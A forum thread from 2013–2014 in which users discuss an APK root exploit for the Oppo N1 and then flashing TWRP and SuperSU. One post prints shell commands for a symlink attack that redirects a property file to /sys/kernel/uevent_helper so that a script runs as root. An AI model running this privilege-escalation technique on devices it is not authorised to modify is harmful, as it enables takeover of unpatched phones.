APK root exploit

jcase · Nov 23, 2013

I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit

Mr_Bartek · Nov 24, 2013

Do you have a link to their research or are their findings private?

Regards,

jcase · Nov 24, 2013

Mr_Bartek said:
Do you have a link to their research or are their findings private?

Regards,

saurik - his analysis of the "second master key vuln"

giantpune for his symlnink attack vuln in property space:

Code:

/system/bin/mv /data/property /data/backupprop
/system/bin/mkdir /data/property
/system/bin/ln -s /sys/kernel/uevent_helper /data/property/.temp
/system/bin/setprop persist.sys.fail /data/pwn.sh

coolrevi · Nov 24, 2013

jcase said:
I tweeted this a couple week ago before the N1 was publicly out but here you go, nothing fancy, no real ui or output.

Thanks to Saurik and Giantpune for contributing (ie its based on their research)

Install apk, run apk wait 1 minute, install supersu app from market then uninstall with this command

adb uninstall com.qualcomm.privinit

Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.

jcase · Nov 24, 2013

coolrevi said:
Will this exploit work in any other device. when i try to install the play store warns about the vulnerability. Will this vulnerability be gone after uninstalling oppoown.

Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from

Ricky Divjakovski · Nov 24, 2013

jcase said:
Possibly other oppo devices

No it doesnt fix the vuln, just becareful where you install apps from

a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!

pulser_g2 · Nov 24, 2013

ricky310711 said:
a second mater key vulnurability? hmm, so this could might not be patched in 4.4?
great job by the way, i dont have the device but this is interesting!

It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

Ricky Divjakovski · Nov 24, 2013

pulser_g2 said:
It should be patched in 4.4.

But some (read most) OEMs still can't manage to patch their devices up to the latest security updates on release.

Anyway, I tested this root method a week or so ago and it works nicely

so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...

jcase · Nov 24, 2013

ricky310711 said:
so your saying in most devices the master key patch could be a possible vulnurabillity still in 4.3?

interesting...

It depends on if OEMs backported it, depends on which build OEMs used and depends on the bug. Four or five different zip parser bugs with similar results. This one I used was patched in 4.3, but other exist.

trickraca · Jan 1, 2014

Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.

jcase · Jan 1, 2014

trickraca said:
Im trying to figure out why oppown apk will not install in my n1. everytime i try it just. Says app not installed. But on the install screen it says something about being an update to an already installed program. Any clues as to what the issue is? all ive done is update to the latest ota software and im currently located in indonesia if that makes a difference.

Possible they patched it by now, if you are on cyanogenmod you are certainly patched

Sent from my HTC Two

giuliano rigon · Jan 2, 2014

jcase said:
Possible they patched it by now, if you are on cyanogenmod you are certainly patched

Sent from my HTC Two

So show do you root the cyanogenmod edition n1.. Can you help please.. Does it come rooted or what..

jcase · Jan 2, 2014

giuliano rigon said:
So show do you root the cyanogenmod edition n1.. Can you help please.. Does it come rooted or what..

It should not come rooted, if it comes rooted then no way did it pass CTS. I'm guessing unlocking the bootloader and flashing a recovery? I don't know, I dont have one

Harfainx · Jan 2, 2014

giuliano rigon said:
So show do you root the cyanogenmod edition n1.. Can you help please.. Does it come rooted or what..

You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

giuliano rigon · Jan 2, 2014

noobish doubts..

Harfainx said:
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

Please i ne ed a walthrough..
1) download twrp
2) put it in root of the telephone robot
3) flash it in recovery?
4) reboot recovery wipe cache and dalvik flash omnirom..
Please correct me..
Thank you

Harfainx · Jan 2, 2014

giuliano rigon said:
1) download twrp Yes
2) put it in root of the telephone Yes
Make sure to copy Omnirom to your phone at some point
3) flash it in recovery? No - Flash TWRP in Fastboot if you haven't flashed the recovery already. Use the official Teamwin site for guidance
4) reboot recovery wipe cache and dalvik flash omnirom.. Wipe Cache, Dalvik, System, and Data

Updates in Red

This is off-topic for this thread though. Questions/Info for flashing Omnirom should be addressed in the Omnirom thread.

nowy57 · Jan 2, 2014

Harfainx said:
You don't need to root if you aren't staying on stock. There's no lock anywhere on the bootloader or anything.

Simply flash TWRP in fastboot, then flash Omni (or whatever else) through TWRP.

You should be able to just flash a SuperSU zip in TWRP as well if you want to root the stock ColorOS.

Sent from my N1 using Tapatalk

may you provide to right superSU.zip files

I v got superSU from this link and it doesnt work on first and second CM version

I am not rooted yet ...
thnaks

Harfainx · Jan 2, 2014

nowy57 said:
may you provide to right superSU.zip files

I v got superSU from this link and it doesnt work on first and second CM version
I am not rooted yet ...
thnaks

That does work. You're likely not removing root, but rather just uninstalling SuperSU.

I answered you in your Q&A thread on root.

giuliano rigon · Jan 10, 2014

not rooted.. confirm i can flash

nowy57 said:
may you provide to right superSU.zip files

I v got superSU from this link and it doesnt work on first and second CM version
I am not rooted yet ...
thnaks

I nave tried my damnedest to root .. Fastboot flashing supersu flashing from recovery Direct install from google play complete unroots and reflash letting recovery do it .. No way..
So now i need a last confirmation.. Can i flash omnirom after wipes even if i am unrooted.. And has anyone rooted omnirom or does it come unrooted.. Thanks for the info .. Another idea.. Flashing color OS footing and then flashing omni.. Or is this a late night bad Dream..

---------- Post added at 01:17 AM ---------- Previous post was at 01:05 AM ----------

Harfainx said:
That does work. You're likely not removing root, but rather just uninstalling SuperSU.

I answered you in your Q&A thread on root.

Sorry now i got it.. It was in the forums.. Just unchecking the respect cyanogen settings in the super su menu got me roooted and happy.. Sorry for your time.. I flashed super su zip from recovery rebooted and unchecked .. Now i am set..

cleonardo · Mar 3, 2014

I were rooted myN1 in yesterday, its really good . thankss

Sent from my N1 using XDA Premium 4 mobile app

APK root exploit

Retired Forum Mod / Senior Recognized Developer

Attachments

Mr_Bartek

Guest

Retired Forum Mod / Senior Recognized Developer

Senior Member

Retired Forum Mod / Senior Recognized Developer

Recognized Developer / Inactive RC

Admin Emeritus / Senior Recognized Developer

Recognized Developer / Inactive RC

Retired Forum Mod / Senior Recognized Developer

New member

Retired Forum Mod / Senior Recognized Developer

Senior Member

Retired Forum Mod / Senior Recognized Developer

Retired Forum Moderator

Senior Member

Retired Forum Moderator

Senior Member

Retired Forum Moderator

Senior Member

Senior Member

Similar threads

Top Liked Posts